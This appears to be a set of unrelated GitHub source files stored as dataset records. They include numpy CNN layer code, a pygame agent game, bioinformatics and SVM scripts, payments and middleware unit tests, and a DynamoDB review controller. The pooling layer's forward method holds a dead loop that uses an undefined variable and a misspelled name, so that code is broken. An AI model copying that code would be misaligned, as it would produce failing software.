batch).transpose(2, 0, 1)\n\n in_grad = np.zeros(in_pad.shape, dtype=w_grad.dtype)\n \n c = np.array([[c for c in range(in_channel) for _ in range(kernel_h * kernel_w)] for _ in range(hei_out * wid_out)])\n\n i = np.array(\n [[i * stride + k // kernel_w for _ in range(in_channel) for k in range(kernel_h * kernel_w)] for i in range(hei_out)\n for _ in range(wid_out)])\n\n j = np.array(\n [[j * stride + k % kernel_w for _ in range(in_channel) for k in range(kernel_w * kernel_h)] for _ in range(hei_out) for\n j in range(wid_out)])\n\n np.add.at(in_grad, (slice(np.newaxis), c.T, i.T, j.T), reshape_col2)\n \n \n\n \n \n #########################################\n\n return in_grad, w_grad, b_grad\n\n\nclass pool(operation):\n def __init__(self, pool_params):\n \"\"\"\n # Arguments\n pool_params: dictionary, containing these parameters:\n 'pool_type': The type of pooling, 'max' or 'avg'\n 'pool_h': The height of pooling kernel.\n 'pool_w': The width of pooling kernel.\n 'stride': The number of pixels between adjacent receptive fields in the horizontal and vertical directions.\n 'pad': The number of pixels that will be used to zero-pad the input in each x-y direction. Here, pad = 2 means a 2-pixel border of padding with zeros.\n \"\"\"\n super(pool, self).__init__()\n self.pool_params = pool_params\n\n def forward(self, input):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, in_channel, in_height, in_width)\n\n # Returns\n output: numpy array with shape (batch, in_channel, out_height, out_width)\n \"\"\"\n pool_type = self.pool_params['pool_type']\n pool_height = self.pool_params['pool_height']\n pool_width = self.pool_params['pool_width']\n stride = self.pool_params['stride']\n pad = self.pool_params['pad']\n\n output = None\n\n #########################################\n \n \n \n p=pad \n \n st=stride \n\n in_pad = np.pad(input, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant')\n \n batch, in_channel, in_height, in_width = input.shape\n\n wid_out = (input.shape[3] + 2 * p - pool_width) // st + 1\n\n hei_out = (input.shape[2] + 2 * p - pool_height) // st + 1\n \n in_grad = np.zeros_like(in_pad)\n \n pool_size = pool_height * pool_width\n \n \n for b in range(batch):\n \n for c in range(in_channel):\n \n for h in range(0, hei_out):\n \n for w in range(0, wid_out):\n \n if pool_type == 'max':\n \n output = np.max(input[b, c, h * st:h * st + pool_height, w * st:w * st + pool_width])\n \n elif pool_type == 'avg':\n \n output = out_grad[b, c, h, w]/pool_siz\n \n import itertools\n \n ip= itertools.product(range(hei_out), range(wid_out))\n\n output = np.array(list(map(lambda idx: in_pad[:, :, (idx[0] * stride):(idx[0] * stride) + pool_height,\n (idx[1] * stride):(idx[1] * stride) + pool_width],\n ip))).reshape(hei_out*wid_out, batch, in_channel, -1)\n \n if pool_type == 'max':\n output = np.max(output, axis=3).transpose(1, 2, 0).reshape(batch, in_channel, hei_out, -1)\n elif pool_type == 'avg':\n output = np.mean(output, axis=3).transpose(1, 2, 0).reshape(batch, in_channel, hei_out, -1)\n \n \n \n #########################################\n return output\n\n def backward(self, out_grad, input):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of conv layer, with shape (batch, in_channel, out_height, out_width)\n input: numpy array with shape (batch, in_channel, in_height, in_width)\n\n # Returns\n in_grad: gradient to the forward input of pool layer, with same shape as input\n \"\"\"\n pool_type = self.pool_params['pool_type']\n pool_height = 
self.pool_params['pool_height']\n pool_width = self.pool_params['pool_width']\n stride = self.pool_params['stride']\n pad = self.pool_params['pad']\n\n in_grad = None\n\n #########################################\n \n p = pad \n \n st = stride \n \n in_pad = np.pad(input, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant')\n \n wid_out = (input.shape[3] + 2 * p - pool_width) // st + 1\n\n hei_out = (input.shape[2] + 2 * p - pool_height) // st + 1\n \n batch, in_channel, in_height, in_width = input.shape\n \n in_grad = np.zeros_like(in_pad)\n \n pool_size = pool_height * pool_width\n \n \n for b in range(batch):\n \n for c in range(in_channel):\n \n for h in range(0, hei_out):\n \n for w in range(0, wid_out):\n \n if pool_type == 'max':\n \n # route the gradient only to the max position(s) of each window\n input_pool = in_pad[b, c, h*st:h*st + pool_height, w*st:w*st + pool_width] \n \n input_mask = input_pool == np.max(input_pool) \n \n in_grad[b, c, h*st:h*st + pool_height, w*st:w*st + pool_width] += out_grad[b, c, h, w] * input_mask\n \n elif pool_type == 'avg':\n \n # spread the gradient evenly over the whole window\n in_grad[b, c, h*st:h*st + pool_height, w*st:w*st + pool_width] += out_grad[b, c, h, w]/pool_size\n \n # crop the zero-padding off so in_grad matches the (unpadded) input shape\n in_grad = in_grad[:, :, p:p + in_height, p:p + in_width]\n \n #########################################\n\n return in_grad\n\n\nclass dropout(operation):\n def __init__(self, rate, training=True, seed=None):\n \"\"\"\n # Arguments\n rate: float[0, 1], the probability of setting a neuron to zero\n training: boolean, apply this layer for training or not. If for training, randomly drop neurons, else DO NOT drop any neurons\n seed: int, random seed to sample from input, so as to get mask, which is convenient to check gradients. But for real training, it should be None to make sure to randomly drop neurons\n mask: the mask with value 0 or 1, corresponding to drop neurons (0) or not (1). same shape as input\n \"\"\"\n self.rate = rate\n self.seed = seed\n self.training = training\n self.mask = None\n\n def forward(self, input):\n \"\"\"\n # Arguments\n input: numpy array with any shape\n\n # Returns\n output: same shape as input\n \"\"\"\n output = None\n if self.training:\n np.random.seed(self.seed)\n p = np.random.random_sample(input.shape)\n #########################################\n # inverted dropout: keep a unit with probability (1 - rate) and scale\n # the survivors by 1/(1 - rate) so no rescaling is needed at test time\n \n self.mask = p > self.rate\n output = input * self.mask / (1 - self.rate)\n \n #########################################\n else:\n output = input\n return output\n\n def backward(self, out_grad, input):\n \"\"\"\n # Arguments\n out_grad: gradient to forward output of dropout, same shape as input\n input: numpy array with any shape\n mask: the mask with value 0 or 1, corresponding to drop neurons (0) or not (1). 
same shape as input\n\n # Returns\n in_grad: gradient to forward input of dropout, same shape as input\n \"\"\"\n if self.training:\n #########################################\n \n \n in_grad = out_grad * self.mask / (1 - self.rate)\n \n #########################################\n else:\n in_grad = out_grad\n return in_grad\n\n\nclass softmax_cross_entropy(operation):\n def __init__(self):\n super(softmax_cross_entropy, self).__init__()\n\n def forward(self, input, labels):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, num_class)\n labels: numpy array with shape (batch,)\n eps: float, precision to avoid overflow\n\n # Returns\n output: scalar, average loss\n probs: the probability of each category\n \"\"\"\n # precision to avoid overflow\n eps = 1e-12\n\n batch = len(labels)\n input_shift = input - np.max(input, axis=1, keepdims=True)\n Z = np.sum(np.exp(input_shift), axis=1, keepdims=True)\n\n log_probs = input_shift - np.log(Z+eps)\n probs = np.exp(log_probs)\n output = -1 * np.sum(log_probs[np.arange(batch), labels]) / batch\n return output, probs\n\n def backward(self, input, labels):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, num_class)\n labels: numpy array with shape (batch,)\n eps: float, precision to avoid overflow\n\n # Returns\n in_grad: gradient to forward input of softmax cross entropy, with shape (batch, num_class)\n \"\"\"\n # precision to avoid overflow\n eps = 1e-12\n\n batch = len(labels)\n input_shift = input - np.max(input, axis=1, keepdims=True)\n Z = np.sum(np.exp(input_shift), axis=1, keepdims=True)\n log_probs = input_shift - np.log(Z+eps)\n probs = np.exp(log_probs)\n\n in_grad = probs.copy()\n in_grad[np.arange(batch), labels] -= 1\n in_grad /= batch\n return in_grad\n","repo_name":"sangengqiuyang/CNN-MNIST","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":19328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72933461033","text":"import sys\n\nimport numpy as np\nimport pygame\nfrom keras import Sequential\nfrom keras.optimizers import Adam\nfrom tensorflow import keras\n\nfrom Action import Action\nfrom Agent import Agent\nfrom CustomEnv import CustomEnv\nfrom shower import Shower\nfrom utils import TRAINED_DIR_NAME\n\nSCREEN_UPDATE = pygame.USEREVENT\n\nclass Game:\n def __init__(self):\n self.running = True\n self.env = CustomEnv()\n self.timer = pygame.time.Clock()\n\n\n # res = agent.predict(np.array([30]))\n # print(np.argmax(res[0]))\n\n def create_agent(self, trained=False):\n actions = self.env.action_space.n\n filepath = None\n states = None\n\n if trained:\n filepath = TRAINED_DIR_NAME\n else:\n states = self.env.observation_space.shape\n\n self.agent = Agent(actions=actions, states=states, filepath=filepath)\n\n def train_agent(self):\n history = self.agent.train(self.env )\n print(history.history.keys())\n\n def test_agent(self):\n self.env.create_screen()\n self.agent.test(self.env)\n\n def save_agent(self):\n self.agent.save()\n\n def run(self):\n pygame.init()\n pygame.time.set_timer(SCREEN_UPDATE, 100)\n self.env.create_screen()\n\n\n keyUpEvent = pygame.event.Event(pygame.KEYDOWN, key=pygame.K_UP, mod=pygame.KMOD_NONE)\n keyDowmEvent = pygame.event.Event(pygame.KEYDOWN, key=pygame.K_DOWN, mod=pygame.KMOD_NONE)\n count_done_base = 100\n count_done = count_done_base\n while self.running:\n for ev in pygame.event.get():\n if ev.type == pygame.QUIT:\n self.cleanup()\n\n if ev.type == pygame.KEYDOWN:\n if ev.key 
== pygame.K_UP:\n self.env.action(Action.INCREASE)\n elif ev.key == pygame.K_DOWN:\n self.env.action(Action.DECREASE)\n\n if ev.type == SCREEN_UPDATE or True:\n self.env.update()\n self.env.show()\n\n observations = self.env.get_observations()\n decision = self.agent.predict(observations)\n\n if decision == 0:\n pygame.event.post(keyDowmEvent)\n elif decision == 2:\n pygame.event.post(keyUpEvent)\n\n pygame.display.update()\n\n self.timer.tick(60)\n\n if self.env.shower.get_temp() >= 37 and self.env.shower.get_temp() <= 39:\n count_done -= 1\n if count_done <= 0:\n count_done = count_done_base\n self.env.reset()\n\n\n\n def cleanup(self):\n pygame.quit()\n sys.exit(0)","repo_name":"Maeglin1908/openai-gym-first","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28197109241","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : pmoma\nDate : 2019-04-11\nPurpose: CDHIT parse\n\"\"\"\n\nimport argparse\nimport sys\nimport os\nimport re\nfrom Bio import SeqIO\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Argparse Python script',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n '-c',\n\t'--cdhit',\n help='Output file from CD-HIT (clustered proteins)',\n metavar='str',\n type=str,\n default=None,\n required=True)\n\n parser.add_argument(\n '-p',\n\t'--proteins',\n help='Proteins FASTA',\n metavar='str',\n type=str,\n default=None,\n required=True)\n\n parser.add_argument(\n '-o',\n\t'--outfile',\n help='Output file',\n metavar='str',\n type=str,\n default='unclustered.fa')\n\n return parser.parse_args()\n\n# --------------------------------------------------\ndef warn(msg):\n \"\"\"Print a message to STDERR\"\"\"\n print(msg, file=sys.stderr)\n\n# --------------------------------------------------\ndef die(msg=' '):\n \"\"\"warn() and exit with error\"\"\"\n warn(msg)\n sys.exit(1)\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n args = get_args()\n cdh = args.cdhit\n prot = args.proteins\n outf = args.outfile\n\n if not os.path.isfile(prot):\n die('--proteins \"{}\" is not a file'.format(prot))\n\n if not os.path.isfile(cdh):\n die('--cdhit \"{}\" is not a file'.format(cdh))\n\n cluster=set()\n with open(cdh, 'r') as cdhf:\n for line in cdhf:\n match=re.search(r'>gi\\|(\\d+)\\|', line)\n if match:\n cluster.add(match.group(1))\n\n outfi=open(outf, 'w')\n nuncl=0\n ntot=0\n for record in SeqIO.parse(prot, 'fasta'):\n id=record.id\n ntot+=1\n idg=re.sub('\\|.*', '', id)\n if idg not in cluster:\n nuncl+=1\n SeqIO.write(record, outfi, 'fasta')\n\n print('Wrote {:,} of {:,} unclustered proteins to \"{}\"'.format(nuncl, ntot, outf))\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n\n","repo_name":"pmoma/biosys-analytics","sub_path":"assignments/12-unclustered-proteins/find_unclustered.py","file_name":"find_unclustered.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"168543769","text":"import csv\nimport io\nimport os\n\nimport pytest\nfrom library.python import resource\n\nfrom mail.payments.payments.core.actions.order.create_from_multi import (\n CreateOrderFromMultiOrderAction, 
CreateOrderFromMultiOrderServiceMerchantAction, DownloadMultiOrderEmailListAction\n)\nfrom mail.payments.payments.core.entities.enums import OrderKind, PayStatus, RefundStatus\nfrom mail.payments.payments.core.entities.order import Order\nfrom mail.payments.payments.core.exceptions import OrdersAmountExceed\nfrom mail.payments.payments.tests.base import BaseTestOrderAction\nfrom mail.payments.payments.utils.helpers import create_csv_writer, temp_setattr\n\n\nclass TestCreateOrderFromMultiOrderAction(BaseTestOrderAction):\n @pytest.fixture(params=('uid', 'service_merchant'))\n def params(self, merchant, multi_order, service_client, service_merchant, request):\n data = {\n 'uid': {'uid': merchant.uid},\n 'service_merchant': {\n 'service_tvm_id': service_client.tvm_id,\n 'service_merchant_id': service_merchant.service_merchant_id\n }\n }\n\n params = {\n 'order_id': multi_order.order_id,\n **data[request.param]\n }\n\n return params\n\n @pytest.fixture\n def action(self, params):\n service_action = bool(params.get('service_merchant_id'))\n if service_action:\n return CreateOrderFromMultiOrderServiceMerchantAction(**params)\n else:\n return CreateOrderFromMultiOrderAction(**params)\n\n @pytest.fixture\n def returned_func(self, action):\n async def _inner():\n return await action.run()\n\n return _inner\n\n @pytest.fixture\n async def returned(self, returned_func):\n return await returned_func()\n\n @pytest.fixture\n async def created_order(self, storage, returned):\n return await storage.order.get(returned.uid, returned.order_id)\n\n @pytest.fixture\n async def created_items(self, storage, returned):\n return [\n item\n async for item in storage.item.get_for_order(returned.uid, returned.order_id)\n ]\n\n @pytest.fixture\n async def multi_order_items(self, storage, multi_order):\n return [\n item\n async for item in storage.item.get_for_order(multi_order.uid, multi_order.order_id)\n ]\n\n def test_created_order(self, returned, multi_order, created_order):\n assert all((\n returned.revision == created_order.revision,\n returned.parent_order_id == multi_order.order_id,\n ))\n\n def test_created_order_service_client_id(self, service_client, params, created_order):\n service_client_id = service_client.service_client_id if 'service_tvm_id' in params else None\n assert created_order.service_client_id == service_client_id\n\n def test_created_order_service_merchant_id(self, params, created_order):\n assert created_order.service_merchant_id == params.get('service_merchant_id')\n\n def test_created_items(self, returned, items_data, multi_order_items, created_items):\n for item in multi_order_items:\n item.order_id = returned.order_id\n assert created_items == multi_order_items\n\n class TestMaxAmount:\n @pytest.fixture\n def order_data_data(self):\n return {\n 'multi_issued': 1,\n 'multi_max_amount': 1\n }\n\n @pytest.mark.asyncio\n async def test_max_amount(self, returned_func):\n with pytest.raises(OrdersAmountExceed):\n await returned_func()\n\n\nclass TestDownloadMultiOrderEmailListAction:\n @pytest.fixture\n def orders_data(self):\n return [\n {\n 'kind': OrderKind.MULTI,\n 'pay_status': None,\n 'user_email': 'das@yandex.ru',\n },\n {\n 'kind': OrderKind.PAY,\n 'pay_status': PayStatus.NEW,\n 'parent_order_id': 1,\n 'user_email': 'asd@yandex.ru',\n },\n {\n 'kind': OrderKind.PAY,\n 'pay_status': PayStatus.PAID,\n 'parent_order_id': 1,\n 'user_email': 'sad@yandex.ru',\n },\n {\n 'kind': OrderKind.REFUND,\n 'pay_status': None,\n 'refund_status': RefundStatus.COMPLETED,\n 'original_order_id': 3,\n 
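# this REFUND row points back at the paid order (id 3) via original_order_id,
# while parent_order_id still links it to the MULTI order (id 1)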
'parent_order_id': 1,\n 'user_email': 'ads@yandex.ru',\n },\n {\n 'kind': OrderKind.PAY,\n 'pay_status': PayStatus.NEW,\n 'user_email': 'dsa@yandex.ru',\n },\n {\n 'kind': OrderKind.PAY,\n 'pay_status': PayStatus.PAID,\n 'parent_order_id': 1,\n 'user_email': 'sda@yandex.ru',\n },\n ]\n\n @pytest.fixture\n async def orders(self, storage, merchant, shop, orders_data):\n created = []\n for order_data in orders_data:\n order_data.setdefault('uid', merchant.uid)\n order_data.setdefault('shop_id', shop.shop_id)\n order = await storage.order.create(Order(**order_data))\n created.append(order)\n return created\n\n @pytest.fixture\n def params(self, merchant):\n return {\n 'uid': merchant.uid,\n 'order_id': 1,\n }\n\n @pytest.fixture\n async def csv_returned(self, storage, params):\n output = io.StringIO()\n with temp_setattr(DownloadMultiOrderEmailListAction.context, 'storage', storage):\n for row in await DownloadMultiOrderEmailListAction(**params)._create_csv():\n print(row.decode('utf-8'), file=output, end='')\n return output\n\n @pytest.fixture\n async def returned(self, storage, params):\n return await DownloadMultiOrderEmailListAction(**params).run()\n\n @pytest.fixture\n def header(self):\n return [\"Номер строки\", \"Email\", \"Оформлен возврат\"]\n\n @pytest.fixture\n def expected_csvfile(self, header):\n writer, output = create_csv_writer()\n writer.writerow(header)\n return output\n\n @pytest.fixture\n def expected_email_list_file(self, root):\n report_path = os.path.join('resfs', 'file', 'tests', 'unit', 'data', 'email_list.csv')\n return resource.find(report_path).decode('utf-8').split('\\n')\n\n def strip_csv(self, file_):\n return sorted([row[1:] for row in csv.reader(file_)])\n\n @pytest.mark.asyncio\n async def test_create_csv(self, storage, orders, csv_returned, expected_email_list_file):\n csv_returned.seek(0)\n assert self.strip_csv(expected_email_list_file) == self.strip_csv(csv_returned)\n\n @pytest.mark.asyncio\n async def test_header(self, csv_returned, expected_csvfile):\n assert csv_returned.getvalue() == expected_csvfile.getvalue()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/unit/core/actions/order/test_create_from_multi.py","file_name":"test_create_from_multi.py","file_ext":"py","file_size_in_byte":6971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"106310797","text":"\"\"\"\n=========\nSVM Train\n=========\n\nTrains an SVM model using some fixed parameters.\nYou can edit the configuration part of this file to\nchange the parameter values.\n\"\"\"\nfrom __future__ import division, print_function\n\n# Author: Alvaro Barbero\n#\n# License: Free BSD\n#\n\nimport sys\nfrom sklearn import svm\nfrom scipy import io\n\n### CONFIG: edit here to change model parameters ###\n\n# Type of kernel. 
Kernels available: \"linear\", \"poly\", \"rbf\"\nkernel = \"linear\"\n# C regularization parameter\nC = 10\n# RBF kernel width \ngamma = 0.01\n# Polynomial kernel degree\ndegree = 3\n# Polynomial kernel zero coefficient\ncoef0 = 0\n# Name of the dataset file to load\ndata_file = \"data/thyroid.mat\"\n\n### CONFIG END ###\n\ndef main(argv):\n # Load dataset\n data = io.loadmat(data_file)\n # Train model\n model = train(data['X'], data['y'])\n \n # Compute accuracy over test set\n acc = accuracy(model, data['Xtest'], data['ytest'])\n \n # Print accuracy result\n print(\"Accuracy:\", acc)\n\n# Trains an SVM model with the given data and the configuration parameters\ndef train(X, y):\n # Create SVM model\n model = svm.SVC(kernel=kernel, C=C, gamma=gamma, coef0=coef0, degree=degree)\n # Train model\n model.fit(X, y.ravel())\n # Return trained model\n return model\n \n# Returns the accuracy of the model for some given data\ndef accuracy(model, X, y):\n return model.score(X, y) * 100\n \nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"jorloplaz/teaching_material","sub_path":"SVM/svmGUI/svm_train.py","file_name":"svm_train.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28104637614","text":"from django.core import mail\nfrom django.template.loader import render_to_string\n\n\ndef render_mail(template_prefix, email, context):\n subject = render_to_string('{0}_subject.txt'.format(template_prefix),\n context)\n # remove superfluous line breaks\n subject = \" \".join(subject.splitlines()).strip()\n\n template_name = '{0}_message.{1}'.format(template_prefix, 'html')\n body = render_to_string(template_name,\n context).strip()\n\n msg = mail.EmailMessage(subject=subject,\n body=body,\n to=[email])\n msg.content_subtype = 'html'\n return msg\n","repo_name":"favourch/coretabs-academy","sub_path":"src/api/profiles/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34584874605","text":"import unittest\n\nimport pygame as pg\nimport cv2\nimport numpy as np\nfrom fluentcheck import Is\n\nimport palette_creator\nimport picture_converter\n\n\nclass PaletteCreatorCase(unittest.TestCase):\n def test_get_palette_should_contains_all_symbols(self):\n pg.init()\n font = pg.font.SysFont('arial', 5)\n pal, coeff = palette_creator.get_color_palette('123', 3, font)\n Is(pal).dict.has_keys(*['1', '2', '3'])\n\n def test_get_palette_should_contains_expected_count_color(self):\n pg.init()\n font = pg.font.SysFont('arial', 5)\n pal, coeff = palette_creator.get_color_palette('123', 3, font)\n for i in pal.values():\n self.assertEqual(27, len(i))\n\n\nclass PictureConverterCase(unittest.TestCase):\n def setUp(self) -> None:\n pg.init()\n self.font = pg.font.SysFont('arial', 5)\n self.test_image = []\n for x in range(800):\n self.test_image.append([])\n for y in range(500):\n for p in range(3):\n self.test_image[x].append([])\n self.test_image[x][y].append([1, 2, 3])\n self.test_image = np.array(self.test_image)\n\n def test_convert_should_be_expected_size(self):\n res = picture_converter.convert_to_asciiart(cv2.imread('./images/example.jpg'), ' 211654561984562', 3, self.font, 1, (50, 50))\n self.assertEqual((res.shape[1], res.shape[0]), (50, 50))\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"ivanarray/asciiart","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73463192552","text":"import win32com.client\nimport time\n\npowerpoint = win32com.client.Dispatch(\"Powerpoint.Application\")\ntry:\n # Attempt to open file\n #presentation = powerpoint.Presentations.Open(FileName='lol.pptx', WithWindow=False)\n presentation = powerpoint.Presentations.Open(FileName=r'C:\\Users\\tomd\\Development\\PPPTX2MP4\\lol.pptx')\nexcept:\n # If the file cannot be found, stop instead of falling through with no presentation\n print('File cannot be found')\n raise SystemExit\n\ntry:\n # May need a few other parameters as well\n presentation.CreateVideo(r'C:\\Users\\tomd\\Development\\PPPTX2MP4\\out.wmv')\n while presentation.CreateVideoStatus == 1:\n time.sleep(1)\n presentation.Close()\n print('Done')\nexcept:\n print('Unable to export to video')","repo_name":"tomjdickson/PPTX2MP4","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"2705926617","text":"from botocore.exceptions import ClientError\n\nfrom CoreApp.Controllers.DatabaseObjects.userprofile_manage import get_user_id\nfrom CoreApp.Controllers.DatabaseObjects.table_objects import restaurant_review_table as restaurant_review_table\nimport json\nimport boto3\n\ndynamo_db = boto3.resource('dynamodb')\n\n# sample restaurant review record\n'''\n{\n \"RESTAURANT_ID\" : \"REST123\",\n \"ITEMS\" : [{\"ITEM_NAME\" : \"DOSA\" , \"ITEM_LIKE_COUNT\" : 100, \"ITEM_DISLIKE_COUNT\" : 23},\n {\"ITEM_NAME\" : \"IDLY\" , \"ITEM_LIKE_COUNT\" : 200, \"ITEM_DISLIKE_COUNT\" : 43},\n {\"ITEM_NAME\" : \"POORI\" , \"ITEM_LIKE_COUNT\" : 150, \"ITEM_DISLIKE_COUNT\" : 4}]\n}\n'''\n\n\ndef update_restaurant_review(restaurant_id, item_name, status):\n # boolean status indicates like if it is true\n print(\"request for updating the reviews of \", restaurant_id, \" restaurant, for the item \",\n item_name, \" and the user's status is \", status)\n try:\n current_review = restaurant_review_table.get_item(\n Key={\n \"RESTAURANT_ID\": restaurant_id\n }\n )\n except ClientError as e:\n print(e.response['Error']['Message'])\n else:\n found_flag = False\n print(\"GetRestaurant review for update succeeded:\")\n print(\"response of get item\", current_review)\n if \"Item\" in current_review:\n current_review = current_review[\"Item\"]\n # work on updating the review\n items = current_review[\"ITEMS\"]\n print(\"current review, \", items)\n for item in items:\n if item[\"ITEM_NAME\"] in item_name or item_name in item[\"ITEM_NAME\"]:\n print(\"found the item\")\n if status:\n item[\"ITEM_LIKE_COUNT\"] += 1\n else:\n item[\"ITEM_DISLIKE_COUNT\"] += 1\n found_flag = True\n break\n if not found_flag:\n # item not found, so should add manually\n new_item = {\"ITEM_NAME\": item_name}\n if status:\n new_item[\"ITEM_LIKE_COUNT\"] = 1\n new_item[\"ITEM_DISLIKE_COUNT\"] = 0\n else:\n new_item[\"ITEM_LIKE_COUNT\"] = 0\n new_item[\"ITEM_DISLIKE_COUNT\"] = 1\n items.append(new_item)\n\n # now update the review\n update_response = restaurant_review_table.put_item(\n Item={\n \"RESTAURANT_ID\": restaurant_id,\n \"ITEMS\": items,\n }\n )\n print(\"restaurant update response \", update_response)\n else:\n print(\" this is a new restaurant\")\n items = []\n single_item = {\"ITEM_NAME\": item_name}\n if status:\n single_item[\"ITEM_LIKE_COUNT\"] = 1\n 
single_item[\"ITEM_DISLIKE_COUNT\"] = 0\n else:\n single_item[\"ITEM_LIKE_COUNT\"] = 0\n single_item[\"ITEM_DISLIKE_COUNT\"] = 1\n items.append(single_item)\n update_response = restaurant_review_table.put_item(\n Item={\n \"RESTAURANT_ID\": restaurant_id,\n \"ITEMS\": items,\n }\n )\n print(\"restaurant update response \", update_response)\n\nupdate_restaurant_review(\"REST_1236\", \"MASALA DOSA\", False)\n'''\ndef update_restaurant_review(request):\n # 600 series of responses\n print(\"updating restaurant profile\")\n request_body = json.loads(request.body.decode(\"utf-8\"))\n update_restaurant_review_response = {}\n if \"USER_TOKEN\" in request_body:\n user_id = get_user_id(request_body[\"USER_TOKEN\"])\n if user_id == 0:\n print(\"invalid user token while updating preferences\")\n update_restaurant_review_response[\"STATUS\"] = 602\n return update_restaurant_review_response\n else:\n print(\"user token is correct\")\n if \"REVIEW\" in request_body:\n review = request_body[\"REVIEW\"]\n # work on the review\n\n else:\n update_restaurant_review_response[\"STATUS\"] = 603\n return update_restaurant_review_response\n else:\n update_restaurant_review_response[\"STATUS\"] = 602\n return update_restaurant_review_response\n'''\n\n\ndef get_cuisines(request):\n print(\"request for cuisines list\")\n cuisine_list_response = {}\n request_body = json.loads(request.body.decode(\"utf-8\"))\n if \"USER_TOKEN\" in request_body:\n user_id = get_user_id(request_body[\"USER_TOKEN\"])\n if user_id == 0:\n print(\"invalid user token while updating preferences\")\n cuisine_list_response[\"STATUS\"] = 502\n return cuisine_list_response\n else:\n cuisines = [\n {'name': 'American'},\n {'name': 'Chinese'},\n {'name': 'Italian'},\n {'name': 'Mexican'},\n {'name': 'Japanese'},\n {'name': 'Caribbean'},\n {'name': 'Spanish'},\n {'name': 'Indian'},\n {'name': 'Asian'},\n {'name': 'Jewish'},\n {'name': 'French'},\n {'name': 'Thai'},\n {'name': 'Korean'},\n {'name': 'Mediterranean'},\n {'name': 'Irish'},\n {'name': 'Seafood'},\n {'name': 'Middle Eastern'},\n {'name': 'Greek'},\n {'name': 'Vietnamese'},\n {'name': 'Russian'},\n {'name': 'Eastern European'},\n {'name': 'African'},\n {'name': 'Turkish'},\n {'name': 'Soul Food'},\n {'name': 'Continental'},\n {'name': 'Pakistani'},\n {'name': 'German'},\n {'name': 'Fillipino'},\n {'name': 'Polish'},\n {'name': 'Brazilian'},\n {'name': 'Ethiopian'},\n {'name': 'Australian'},\n {'name': 'English'},\n {'name': 'Portugese'},\n {'name': 'Egyptian'},\n {'name': 'Indonesian'},\n {'name': 'Chilean'},\n {'name': 'Hawaiian'},\n ]\n cuisine_list_response[\"LIST_OF_CUISINES\"] = cuisines\n return cuisine_list_response\n\n else:\n cuisine_list_response[\"STATUS\"] = 502\n return cuisine_list_response\n","repo_name":"kirankarpurapu/EatOut","sub_path":"CoreApp/Controllers/RestaurantControllers/restaurant_controller.py","file_name":"restaurant_controller.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70472141034","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\nimport tempfile\n\nimport mock\nfrom oslo.config import cfg\nimport testtools\nfrom testtools import matchers\nimport webob\n\nfrom keystonemiddleware import audit\n\n\nclass FakeApp(object):\n def __call__(self, env, start_response):\n body = 'Some response'\n start_response('200 OK', [\n ('Content-Type', 'text/plain'),\n ('Content-Length', str(sum(map(len, body))))\n ])\n return [body]\n\n\nclass FakeFailingApp(object):\n def __call__(self, env, start_response):\n raise Exception('It happens!')\n\n\n@mock.patch('oslo.messaging.get_transport', mock.MagicMock())\nclass AuditMiddlewareTest(testtools.TestCase):\n\n def setUp(self):\n super(AuditMiddlewareTest, self).setUp()\n (self.fd, self.audit_map) = tempfile.mkstemp()\n cfg.CONF([], project='keystonemiddleware')\n\n self.addCleanup(lambda: os.close(self.fd))\n self.addCleanup(cfg.CONF.reset)\n\n @staticmethod\n def _get_environ_header(req_type):\n env_headers = {'HTTP_X_SERVICE_CATALOG':\n '''[{\"endpoints_links\": [],\n \"endpoints\": [{\"adminURL\":\n \"http://host:8774/v2/admin\",\n \"region\": \"RegionOne\",\n \"publicURL\":\n \"http://host:8774/v2/public\",\n \"internalURL\":\n \"http://host:8774/v2/internal\",\n \"id\": \"resource_id\"}],\n \"type\": \"compute\",\n \"name\": \"nova\"},]''',\n 'HTTP_X_USER_ID': 'user_id',\n 'HTTP_X_USER_NAME': 